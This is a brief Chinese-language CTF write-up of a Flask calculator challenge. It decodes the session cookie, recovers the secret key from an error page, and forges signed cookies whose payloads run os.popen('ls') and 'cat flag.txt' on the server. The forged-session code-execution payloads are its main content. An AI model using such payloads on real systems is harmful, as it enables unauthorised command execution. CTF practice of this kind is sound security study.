解题
脚本地址
看的wp
进来是个计算器
进行简单的计算,扫目录,没有东西,看源码,没有思路,wp说cookie是flask的cookie,尝试解码
python flask_session_cookie_manager3.py decode -c "eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArIDIifV19.YAQlbQ.lTuaVxqCqH6io5mQoHT3hSe7i6w"
刚好就是提交的东西,只需要伪造session就行,伪造session必须拿到secrect_key
输入1/0能够报错
构造payload的查看根目录
python flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history':[{'code':'__import__(\"os\").popen(\"ls\").read()'}]}"
读取flag
python flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history':[{'code':'__import__(\"os\").popen(\"cat flag.txt\").read()'}]}"